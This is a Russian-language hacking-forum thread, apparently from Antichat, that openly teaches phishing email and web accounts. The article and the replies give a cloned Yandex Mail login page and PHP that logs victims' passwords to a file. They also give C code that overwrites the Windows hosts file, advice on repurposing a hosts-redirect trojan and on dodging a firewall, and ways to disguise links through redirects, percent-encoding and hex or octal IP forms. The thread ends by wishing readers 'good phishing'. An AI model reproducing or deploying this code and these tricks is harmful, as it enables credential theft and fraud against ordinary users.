Форум АНТИЧАТ - Все о фейках

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)

- - Все о фейках (https://forum.antichat.xyz/showthread.php?t=39047)

Все о фейках

Фейк - от англ. Fake, - фальшивый, поддельный, ненастоящий
Нас повсюду окружают фальшивки. С этим явлением любой из нас сталкивается каждый день, по странной привычке, этого уже не замечая.
Можно перебирать свою жизнь, как перебирают крупу, держа ее на ладони и выискивая сорные семена.....
1.Задача
Соответственно с названия видно что нам надо будет подделать в данном случае страничку. Не проблема (что бы не лить лишний бред в статью я предполагаю что читатели уже знают что такое хостинг и доменные имена)регистрируем хостинг (любой с поддержкой php и e-mail) и с помошью программы допустим Teleport Pro сливаем сайт,а можно и одну страничку авторизации,главное что бы она была точной копией оригинала.
Дальше нужно найти форму с нашей авторизацией
2.Практика
Если фразу html формы вы слышите в первый раз советую почитать информацию _http://linux4u.jinr.ru/docs/html/lesson14.html
_http://www.opennet.ru/base/dev/html_form.txt.html
Если вы поняли что такое формы вам не составит труда найти в сорцах странички (исходный код) формы с нужными нам значениями.

Код HTML:

<form action="1.php" method="POST"> 

    <input type="text" name="login"> 

    <input type="password" name="pass"> 

    <select name="dom"><option value="mail.ru">@mail.ru</option> 

    </select> 

    <br > <input type="submit" value="Войти"> 



    </form>

Теперь дописываем так,что бы пароли сохранялись у нас:)

PHP код:


		
			
if(@$_POST['login']){    условие

$fp = fopen ("file.txt", "a"); открытие файла

fwrite ($fp, "$_POST[pass] : $_POST[login] : $_POST[dom] \n");  пишем в файл данные которые ввел юзер на фейковой страничке 

fclose ($fp); закрываем файл.

Про работу с файлами на php можно прочитать тут
2.Подводный камень
Допустим вы сделали все указанные рекомендации и у вас есть нормальная фейковая страничка,но как заставить юзера пройти по ссылке blabla.xal9vnuy-xost.ru при этом что бы он заполнил форму авторизации как на сайте-оригинале.Теперь наша задача сделать так что бы допустим жертва ввел(а) у себя адрес mail.ru и попала к вам на страничку.Не реально?
Способ 1-Есть такой замечательный файлик как hosts,нам нужна троянская программа которая представляет собой модифицированный файл ОС Windows %System%\drivers\etc\hosts, который используется для перевода доменных имен (DNS) в IP-адреса. Размер измененного файла составляет 284 байта. Файл модифицирован таким образом, чтобы заблокировать или перенаправить обращения пользователя к перечисленным ниже сайтам.

В файл hosts добавлены следующие строки:

61.129.75.124 mir.100888290cs.com
61.129.75.124 woool.100888290cs.com
61.129.75.124 www.mir5173.com
61.129.75.124 ert0003.e76.163ns.com
219.147.204.249 www.chenshijituan.com
59.36.96.132 qq.etsoft.com.cn
127.0.0.1 eb114.net
127.0.0.1 www.u7u.cn
61.129.75.124 www.wg581.com

Таким образом, все запросы к данным серверам будут заблокированы или перенаправлены на соответствующие сервера.
Троян называется Trojan.Win32. Qhost.hq
Найдя его исходники можно модифицировать записи 61.129.75.124 mir.100888290cs.com
61.129.75.124 woool.100888290cs.com
на свои допустим
127.0.0.1 mail.ru
Да и самому такой вирус написать не особо сложно
Способ 2 Допустим нужно отправить жертве письмо с фейковой ссылкой
Можно использовать редирект допустим от тех же служб mail.ru.
Допустим мыло yahoo,у нас домен что то вроде y.yahoo.com,делаем редирект y.yahoo.com/asd/forum.antichat.ru - не плохо выглядит:)
Но можно придать еше более красивый вид :
известно, что текстовая информация, передаваемая браузерами вместе с URL, перед посылкой по Сети подвергается некоторой обработке. Так, например, все символы space (пробел) заменяются кодом %20. То же самое можно сделать с любым символом твоего адреса
Кодируем forum.antichat.ru и получаем что то вроде
y.yahoo.com/asd/%77%77%77%2E%66%6F%72%75%6D%2E%61
Если к этой ссылочке приложить грамотную соц инженерию,то я думаю достаточно людей поверят и пройдут.Закодировать адрес можно charackter encoding calculator ,или алголовским инет крякером.
4.Остальное Так же хочу сказать что если следовать первой фразе статьи то фейк это подделка чего либо,не стоит зацикливаться только на фейках страничек. Например можно делать фейки софта.Зачем? Ну существует много программ в которых нужно вводить пароли,например тот же мейл агент.Но делать фейковый софт сложнее чем фейковые странички ибо слить картинки и html форму не проблема...
4.Заключение
Старался охватить все что знаю про фейки,но уверен что это далеко не все поэтому буду по ходу дописывать,особенно про способы подмены ip.
Спасибо за внимание,удачного фишинга=)
Пишем замечания

читал не давно на геймерском форуме, ты там запостил. . . Статья так себе, нового нету для меня, но для других может откроет. Интересно было почитать ;)

А чо с оутпостом делать будешь, который сразу на*** пошлет твоего троя при попытке изменить хостс?

Можно приглушить пробовать,замаскировать самого троя.

Код:

#include <conio.h>

#include <stdio.h>

FILE *f;

int x=1000;

void main ()

{

clrscr ();

f=fopen("C:\\WINDOWS\\system32\\drivers\\etc\hosts","w");

fprintf (f,"%i",x);

fclose (f);

}

Вот накатал по шустряку ,у кого норм фаер стоит откомпильте запустите pLz

Аутпост кричит((Его только асемблером в доверенный процесс втираться или еще как можно?

Делаю фэйк для mail.yandex.ru...

Цитата:

<?
header("Content-Type:text/html;charset=windows-1251");
?><html lang="ru"><head><title>Яндекс.Почта</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<link rel="SHORTCUT ICON" type="image/x-icon" href="/favicon.ico">
<link rel="stylesheet" type="text/css" href="files/common.css">
<link rel="stylesheet" type="text/css" href="files/mail-common.css">
<link rel="stylesheet" type="text/css" href="files/mail-login.css">
<style type="text/css"></style>
<script type="text/javascript">var fromMail = false;</script><script type="text/javascript" src="http://passport.yandex.ru/passport?mode=testloginjs&id42426765"></script>
<script type="text/javascript" src="files/index_main.js"></script></head>
<body style="background-image:url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=yandex_mail/?id42426765)">
<table class="layout root"><tr><td class="layout content"><div align="center"><a href="http://www.yandex.ru/">
<img src="files/yandex.gif" alt="Яndex" width="136" height="83"></a></div>
<table class="layout main" width="100%">
<tr class="layout" valign="top">
<td class="features layout">
<div id="featuresCell">
<h2>Почта Яндекса — это:</h2>
<p class="plus big">
<span><a href="http://mail.yandex.ru/unlimited">Бесконечный ящик</a></span>
<br>Вы можете не думать о том, сколько места занимают ваши письма.</p>
<p class="plus no-spam"><span><a href="http://help.yandex.ru/mail/?id=288423">Отсутствие спама</a></span>
<br><a href="http://so.yandex.ru/">
<img src="files/logo_so.gif" alt="Спамооборона" title="Спамооборона" style="margin: 3px 15px 0 10px;" align="right">
</a>Ваш почтовый ящик надежно защищен программой «<a href="http://so.yandex.ru/">Спамооборона</a>».<br></p>
<p class="plus revolutional">
<span><a href="http://mail.yandex.ru/pda_info">Мобильная версия</a></span>
<br>Для смартфонов, коммуникаторов и КПК.</p>
<p class="plus red">
<span><a href="http://help.yandex.ru/mail/?id=288215" target="_blank">Защита от вирусов</a></span>
<br><a target="_blank" href="http://www.drweb.com/">
<img src="files/drweb2.gif" alt="Dr.Web" title="Dr.Web" align="right" style="margin: 3px 0 0 10px;">
</a>Все письма проверяются антивирусной программой «<a href="http://www.drweb.com" target="_blank">Dr.Web</a>».</p></div></td>
<td id="loginForm" class="form layout">
<div class="tl">
<div class="tr">
<div class="bl">
<div class="br">
<form action="1.php" method="post" name="MainLogin" id="loginform">
<img src="files/heading.gif" alt="Почта" width="136" height="36" style="margin: 15px 0 10px 0;">
<div class="input login">
<label for="inputLogin">логин:</label>
<br><input type="text" name="login" id="inputLogin" tabindex="1"></div>
<div class="input passwd">
<label for="inputPassword">пароль:</label>
<br><input type="password" name="passwd" id="inputPassword" tabindex="2"></div>
<p style="text-align: center;">
<label for="twoweeks">
<input type="checkbox" id="twoweeks" name="twoweeks" value="yes" autocomplete="no" tabindex="3" style="vertical-align: middle;"> запомнить меня</label></p>
<div><input type="hidden" name="retpath" value="http://mail.yandex.ru/?from=mail&r=id35388573">
<input type="submit" value="Войти" class="hugeBtn" tabindex="4"></div>
<p class="forgotten-link"><a href="http://passport.yandex.ru/passport?mode=remember" tabindex="5">
<span>Вспомнить пароль</span></a>
<br><br><a href="http://passport.yandex.ru/passport?mode=register&msg=mail&retpath=ht tp://mail.yandex.ru/?from=mail&r=id35388573" class="new_mail">
<span>Заведите почту на Яндексе</span></a></p></form>
<script type="text/javascript" src="files/forcehttps.js"></script></div></div></div></div></td>
<td class="dignity layout">
<div id="dignityCell">
<h2>Почтовая фишка № 14</h2>
<p><img src="files/marka14.gif" width="162" height="101" alt="Адресная книга"></p>
<p>Умная адресная книга подсказывает адреса при создании письма, причем она знает, что фамилия «Шендерович» может писаться латиницей как Shenderovitch, Schenderovich и дюжиной других вариантов.</p></div></td></tr></table></td></tr>
<tr><td class="layout bottom">
<div id="tuning" class="tuning sys-font hidden">
<p><span id="tips_hide" class="pseudo-link hidden">Убрать информацию слева и справа</span>
<span id="tips_show" class="pseudo-link hidden">Показать информацию</span></p></div>
<div class="footer">
<hr><p class="copy">Чистая почта © 2001—2007 «<a href="http://www.yandex.ru/">Яндекс</a>»
<br><a href="http://feedback.yandex.ru/?from=webmail">Обратная связь</a> ·
<a href="http://stat.yandex.ru/stats.xml?ProjectID=2">Статистика</a> ·
<a href="http://advertising.yandex.ru/mail.xml">Реклама</a></p>
<div class="pda_link">
<a href="/pda">Мобильная версия</a></div>
<div id="made-in" class="made">
<a href="http://www.artlebedev.ru/">
<img src="files/logo-artlebedev.gif" width="90" height="37" alt="art. lebedev"></a> Дизайн —<br> <a href="http://www.artlebedev.ru/">Студия Артемия Лебедева</a></div>
<br clear="all"></div></td></tr></table>
<script type="text/javascript">init(false);</script></body></html>

Создал файл 1.php прописал туда

Цитата:

<?php
if(@$_POST['login']){ условие
$fp = fopen ("file.txt", "a"); открытие файла
fwrite ($fp, "$_POST[passwd] : $_POST[login] \n"); пишем в файл данные которые ввел юзер на фейковой страничке
fclose ($fp); закрываем файл.
?>

И создал файл file.txt прохожу авторизацию на фэйк чтранице но пароли в file.txt Не сохраняются... В чём может быть ошибка?

Проверь правильность написание логин и пасс в 1.php регистр тоже важен.
+ Вроде рядом с полями логина и пароля надо жиддены удалять :\
+ файл фейка, 1.php и file.txt должны иметь значния 777 - ВАЖНО! (скорее всего из-за этого)

Всё делаю как написано, но по нажатию кнопки войти меня перекидывает на страницу http://xxxx.jino-net.ru/1.php
Что делать?

настраивать 1.php

Цитата:

Сообщение от Sandjuro

правильный код

PHP код:


		
			
<?php  if(@$_POST['login']){  $fp = fopen ("file.txt", "a");  fwrite ($fp, "$_POST[passwd] : $_POST[login] \n");  fclose ($fp);  }  ?>

Вложить пример того что сделал
Попробывать создать отдельный файл 1.php
хотя мне кажется что ты написал <form action="1.php"
а файл назвал blabla.php

Раньше этим занимасла народ вёлся ещё как даже ссылку если не маскеровать! А насчёт троя лучше его к какойнить проге приписть

Цитата:

Сообщение от gibson

правильный код

PHP код:


		
			
<?php  if(@$_POST['login']){  $fp = fopen ("file.txt", "a");  fwrite ($fp, "$_POST[passwd] : $_POST[login] \n");  fclose ($fp);  }  ?>

Если уж говорить о правильности. то правильно будет так:

PHP код:


		
			
<?php 

   if(isset($_POST['login'], $_POST['passwd'])) {

   $fp = fopen ("file.txt", "a"); 

   fwrite ($fp, "Login: ".$_POST['login']." pass : ".$_POST['passwd']." \n");  

  fclose ($fp); 

 } 

 ?>

Неплохо бы потом "перекинуть" пользователя обратно. или на открытку какую нить.
Например:
Посылаем пользователю письмо в html формате, мол вам пришла открытка. Меняем там урл на свой с фейком. Пользователь "заного" авторизируется, пишем все это в файл и перекидываем на какую нить открытку

Если уж говорить о правильности, то будет так:

PHP код:


		
			
<?php 

   if(isset($_POST['login'], $_POST['passwd'])) 

{

$file = 'file.txt';

if(file_exists($file))

{

   $fp = fopen ($file, "a"); 

   fwrite ($fp, "Login: ".$_POST['login']." pass : ".$_POST['passwd']." \n");  

  fclose ($fp); 

}

else

{

echo "xek, not found ".$file;

}

 } 

 ?>

насчет

Код:

if(file_exists($file))

если стоят права на запись в самой папке. то функция fopen с флагом "a", если файл не существует - пытается его создать
да и

PHP код:


		
			
else 

{ 

echo "xek, not found ".$file; 

}

Слишком палевно -)
Лучше уж тогда ничего не выводить

2enfix +1 незачем проверять создан ли файл лучше проверить на доступность записи, тем более что стоит отребут а. Лучше

PHP код:


		
			
<?

$file = 'file.php';

if(is_writable($file))

{

header("Location: http://fake.php");

}

else {

header("Location: http://mail.ru");} /



?>

А не подскажите хостинг где моно использовать php и права на запись(выполнение т.е. 777)!!!

Рассмотрю даже платные варианты (конечно не такие как: 30$ за 1 месяц...и траффом в 50 мб...)

Цитата:

Сообщение от Хелпер

jino-net.ru

Как то не катит... я юзаю клиент NextFTP, ставлю напр. на паку иль на файл права 777,,, тычу "ОК"...
Он закрывает...
Я опять открываю а там опять всё сброшено....
Или я дурак::???::: :D :confused:

2Vxx@Mxx хватит разводить флейм не по теме. Бесплатных хостингов куча.
https://forum.antichat.ru/showpost.php?p=44649&postcount=1
https://forum.zloy.org/showthread.php?t=16984
Выбирай на любой вкус.

не пойму если бы я смог впарить троя то на фиг мне фейк пейдж)))

трой это самое приметивное что могут сделать новички, ну конечно не у всех хватит сообразительности его еще "впарить". В отличии от троя, фейк позволяет получить пасс без каких либо загружаемых программ жертве. Т.е вот пример набираешь в браузере mail.ru и 194.67.57.226 попадаешь на одну и туже страницу. Теперь подумай что и как можно изменить и что из этого может получиться.

имхо процедура одинаковая, пройтись по тому заветному адресу в обоих случаях.

ИМХО не одинаковая вот тебе еще три адреса для примера
http://3259185634
http://0xc2.0x43.0x39.0xe2
http://0302.0103.0071.0342
как ты думаешь чел которые в этом не разбирается поймет что это все ведет на "фейк"?

не собираюсь мусорить форум нашими спорами, просто подчеркну что для меня важнее всего заставить( или заинтересовать) юзера открыть письмо и нажать на адрес. Вот об этой процедуре я говорил. А не о том как выглядеть наш адрес.

Блин, скиньте лучше нормальные файки маил яндекс вконтакте

http://shareua.com/files/show/1158481/mailfejg.rar.html

[Dezzter] Бывает сам хост тупит. ты какой юзаешь?

Не ну конечно :
Если фразу html формы вы слышите в первый раз советую почитать информацию ......***
а затем в конце 3 части:
Да и самому такой вирус написать не особо сложно
)))

Цитата:

Сообщение от gibson

а гд можно почитать про то, как так линк "зашифровать"?

Помню была хорошая статья в хакере за 2006 год , точно не вспомню..

Цитата:

Сообщение от k0lbasa

а гд можно почитать про то, как так линк "зашифровать"?

Это не линк шифруют а IP, в шестнадцетиричном и других кодах, хз каких..
-----------------------------------------

Собственно начал писать для того чтобы спросить где взять прогу Teleport Pro но нашёл и сам, думаю дай запостю кому-нить пригодится!
Оф. сайт Version 1.55 на момент поста
Рапида+кейген в 1.50

народ скиньте фейк мелр.ру даж без провеки пойдет,заранее благодарен
плиз в ПП

хорошая татейка, че их про фейки куча развелось,но эт действительно достойная

для тех кому интересен "2 способ"
%2E - .
%77 - w
%66 - f
%6F - o
%72 - r
%75 - u
%6D - m
%61 - a
%71 - q
%74 - t
%73 - s
%76 - v
%79 - y
%62 - b
%63 - c
%64 - d
%65 - e
%69 - i
%67 - g
%68 - h

Цитата:

Сообщение от k0lbasa

а гд можно почитать про то, как так линк "зашифровать"?

Шифрование IP-адреса.

Посмотрим, как можно подгадить любителям наступить на горло чужой песне, скрыв от их глаз адрес своей страницы. Самый обычный IP адрес можно замаскировать так, что даже яйцеголовые спецы по компьютерной безопасности будут долго чесать репы в тяжкой думке, расшифровывая загогулину вроде http://ftp:128.03.60.23@3558/%3351%3040. А что уж говорить о простых смертных!

Форматы адреса

Итак, каждый IP-шник состоит из четырех байт (дорогая, хочешь я тебе расскажу, что такое байт?), разделенных точками. Например, сайты www.chat.ru и www.geocities.com имеют адреса 212.24.32.192 и 209.01.224.18 соответственно. Что набирать в браузере: более удобное символьное имя или строку http://212.24.32.192/ - дело вкуса каждого пользователя. Последний способ оставляет массу возможностей изменить IP своей страницы до неузнаваемости или создать иллюзию обращения совсем на другой сервер.

Шестнадцатеричный трюк

Запустим программу Calculator из стандартного набора Windows (хоть что-то юзабельное из виндов) и последовательно преобразуем каждый байт, входящий в адрес, в шестнадцатеричное (HEX) значение. Получим D4.18.20.C0 для www.chat.ru и D1.01.E0.12 для www.geocities.com.

Теперь можно ссылаться на свою страницу по этим значениям, набирая в браузере http://0xd4.0x18.0x20.0xc0./ Узнать IP адрес стало сложнее, но еще, как говорится, не фонтан: любой, кто когда-нибудь видел программы на С или Assembler, сразу догадается, в чем здесь трюк. Лучший способ взять все четыре байта D41820C0 и перевести их в десятичное (DEC) значение. По получившемуся числу также можно ссылаться на сайт с адресом www.chat.ru: http://3558351040./

Восьмеричный трюк

Еще один вариант, обычно сбивающий с толку даже матерых сисопов - перевести каждую составляющую IP адреса не в шестнадцатеричное, а в восьмеричное (OCT) значение. Тот факт, что число, начинающееся с 0, трактуется программами как восьмеричное, известен далеко не всем: адрес http://0324.030.040.0300/ дает желаемый результат.

А сколько это будет в процентах?

Теперь можно постепенно усложнять полученные адреса, добавляя новые элементы скрытности. Известно, что текстовая информация, передаваемая браузерами вместе с URL, перед посылкой по Сети подвергается некоторой обработке. Так, например, все символы space (пробел) заменяются кодом %20. То же самое можно сделать с любым символом твоего адреса. Чтобы получить необходимый код цифры, достаточно прибавить к ней 30. %33 будет соответствовать цифре 3, а %30 - 0. Подправим полученный ранее десятичный адрес. Теперь http://3558/%3351%3040 также содержит ссылку на www.chat.ru, хотя выглядит уже достаточно устрашающе.

Цитата:

Сообщение от memor

Это что??? :eek: Ты хоть сам пробовалто, что написал? Или лишь-бы скопипастить откуда-то?

Цитата:

Сообщение от =Zeus=

Это что??? :eek: Ты хоть сам пробовалто, что написал? Или лишь-бы скопипастить откуда-то?

А что же тут непонятного) сам так линки шифрую, внимательно почитай